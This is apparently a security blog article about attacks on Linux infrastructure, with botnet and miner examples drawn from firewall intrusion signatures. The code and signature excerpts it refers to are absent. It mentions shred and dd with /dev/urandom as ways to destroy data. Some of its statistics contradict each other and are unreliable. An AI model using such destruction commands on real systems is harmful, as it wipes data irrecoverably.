The Dark Side of Linux: Understanding Threats and Real Attack Attempts

The sky is blue, water is wet, and Linux is the most secure operating system. There's no arguing with that.

The system has many built-in functions that work for its security. Access rights restriction is one of them. In addition, Linux is guarded by a strong user community. They regularly test the system for vulnerabilities and release patches.

However, it is impossible to claim that the protection here works 100%. At the very least, no one is immune from problems with system updates and configuration errors.

In this article, which we prepared together with private detective Yuri Verbitsky, we will examine:

• Why, How and Who Attacks Linux-Using Companies

• how to track attempted attacks, let's look at the technical details using the example of triggered signatures in NGFW.

First, the facts

Today, the Linux kernel is used on a huge number of platforms, including embedded and portable devices. There are hundreds of distributions tailored to any task and user skill level (by the way, if you are new to information security, we recommend staying as far away from the BlackArch distribution as possible).

So, the following are currently running on the Linux kernel:

• two-thirds of the world's web servers. As reported by W3Techs (Web Technology Surveys)Linux as a platform is used by more than 40% of sites for which there is relevant data. If we take the top 1000, the figure is even higher – 47.4%,

• space technology. In particular, 32 missions have been completed using Linux. The operating system is built into the Curiosity rover, and SpaceX uses Linux on Dragon and Falcon 9,

• the Internet of Things, or more precisely, embedded and mobile devices (cameras, lighting, door locks, smart TVs, motion sensors, speakers, thermostats, etc.),

• many popular switches, routers, firewalls,

• solutions for virtualization and cloud computing. Almost all products are built on the Linux kernel, including VMware, Citrix, Docker,

• supercomputers. An example is the supercomputer for the UK meteorological agency GAEA. It is also designed on the Linux base,

• malware 🙂

Linux has a high granularity, which means almost infinite possibilities for customization, management and control. As for Windows NT, here you can only monitor what Microsoft allows.

As you know, it is gradually tightening the screws in relations with Russian companies. That is why many Microsoft clients are now looking at other operating systems. And Linux is the first candidate here.

And what is wrong?

Companies often believe in the super-security of GNU/Linux. Many do not think at all about the risks when working with the system. And even less about the measures by which these risks should be minimized.

For years, forensic experts have seen in practice how “childish” information security problems lead to the compromise of Linux infrastructure:

• weak authentication passwords,

• unpatched vulnerabilities (for example, administrators and developers set up a server and forget about it, because it has been working stably for years, and the firmware does not require special care),

• configuration errors.

It turns out that Linux can be considered the most secure operating system. But only in theory. In practice, companies cannot relax.

Who and how attacks

Historical fact: the very first threat to the Linux kernel is considered to be the so-called “Morris worm”. Let us recall that this malware attacked the ARPANET network on November 2, 1988. The program used mechanisms for automatic distribution over the network and caused the first “denial of service” in history. Much water has flowed under the bridge since then, but the principles of that virus attack are still relevant today.

Now let's get back to the present. Attacks on Linux systems are becoming significantly more frequent. According to Kaspersky Labstheir number has increased by 126% in the last year alone.

The attacks are backed by malware of all kinds: from botnets and miners that infect absolutely everything that is accessible and unprotected on the Internet, to more sophisticated solutions. The latter are used by highly qualified specialists who plan their actions more selectively and carefully. Attacks on Linux infrastructure with their malware usually lead to the complete destruction, encryption or capture of sensitive information. In addition, cyber espionage is also a motive for criminals.

At the same time, attackers often demonstrate sophisticated approaches to developing malware. For example, HelloKitty ransomware targets both platforms (Windows + Linux). And recently, researchers discovered solutions for encrypting ESXi first-level hypervisors.

If the system is compromised, the attackers quickly achieve their goal. In particular, to destroy information in Linux, it is enough to use the shred # command, which deletes data and overwrites it N times. They say that even an experienced information security forensic expert will not be able to recover deleted data. Another option is to use the dd command with the if=/dev/{u}random argument.

What else can we say about attacks on Linux systems:

• The interest of criminals in clouds is growing. An example is the cybercriminal group TeamTNT, which targets Linux-like cloud and container infrastructures. Attackers use advanced Trojans for remote access to the compromised environment. One such tool is CHAOS RAT,

• malware development is more difficult than for Windows NT,

• the set of attack software is becoming more diverse, widespread and difficult to detect. An example is fileless attacks using the Ezuri tool, which is developed in the Golang programming language,

• DarkSide ransomware used Salsa20 and RSA-1024 encryption algorithms in their attacks. They work equally well on both Windows and Linux.

Technical details

The most frequent and relevant motives for infecting Linux infrastructure remain:

• organizing a botnet network for subsequent leasing for the purpose of conducting massive DDoS, as well as using hacked routers and IoT as a proxy to hide the attacking infrastructure in targeted attacks. The situation was largely influenced by the fact that in 2016 the Mirai source code was made publicly available, which was used by everyone who wanted to,

• mining cryptocurrency. Typically, such attacks are associated with Monero, including due to the peculiarities of the blockchain architecture of this cryptocurrency.

These are the cases that information security engineers most often encounter in practice. It is not difficult to detect them if the company has NGFW with regular updates of signatures of intrusion detection systems (aka IDS/IPS). And if an engineer is involved in signature analysis, he can discover a lot of interesting and useful things.

Let's take a closer look at some of the signatures (data collected from one well-configured perimeter FortiGate).

Example 1. Signature of remote execution of arbitrary code in the free ThinkPHP framework for the Apache2 HTTP server:

This is actually an old vulnerability – it's been around for over five years. However, it's still widely used in the wild.

Thanks to NGFW, we can see exactly how the exploit works and — most importantly in our case — the payload and how it is launched. An attempt is made to download the executable file. But it turns out that the sample cannot be obtained so easily. The server hosting the malicious code drops the connection. The reason is the wrong HTTP headers:

Example 1a. A similar infection attempt, but with a different payload:

We receive the data and send it to Virustotal. There we see a malware rating of 38/62. At this point it immediately becomes clear: we are looking at another version of the Mirai botnet.

Example 2. Signature of remote code execution in firmware of D-Link DSL-2750B Small Office\Home Office devices.

The vulnerability dates back to 2020. The exploit is available in the well-known Metasploit framework. If in the previous case there was an executable ELF, now during the analysis we see a shell script with the .sh extension.

By means of simple manipulations we obtain the script itself. We observe the following picture:

The script turns out to be a loader of malicious executable files for various microprocessor architectures.

To understand this, we used the strings tool. With its help, you can determine part of the functionality of almost any compiled virus software. The tool is designed to extract ASCII and UNICODE characters from any file. The practice is widely used in the work of forensic experts and is relevant for Windows, Linux and Mac.

The x86 sample (UnHAnaAW.x86) contains a lot of information that might give a technical specialist some food for thought. In our opinion, here are the most interesting lines:

Juggling a couple of OSINT techniques, we found a github repository of this malware. And not only this one. But let's not talk about that 🙂

Example 3. Signature Multiple.CCTV.DVR.Vendors.Remote.Code.Execution

Here we see the Mozi peer-to-peer botnet, which has been operating since at least 2019. The malware can exploit a vulnerability from 2016 in video surveillance devices from numerous (!) vendors. It is important to emphasize that it can, but is not limited to this equipment. The exploit code can be found freely available on popular resources such as Exploit-DB and Vulners.

An excerpt from the public exploit code that correlates perfectly with what we see in the signature body:

This is not the end yet

While we were analyzing the triggered signatures, an idea came up to deploy a honeypot. Let's remember that such solutions are used to make the attacker believe that he is interacting with a real system.

Which honeypot exactly was chosen, whether it was possible to lure the hackers and how it all ended, we will tell you next time. Follow the publications in our blog, or better yet, subscribe – it will be harder to miss a new article 😉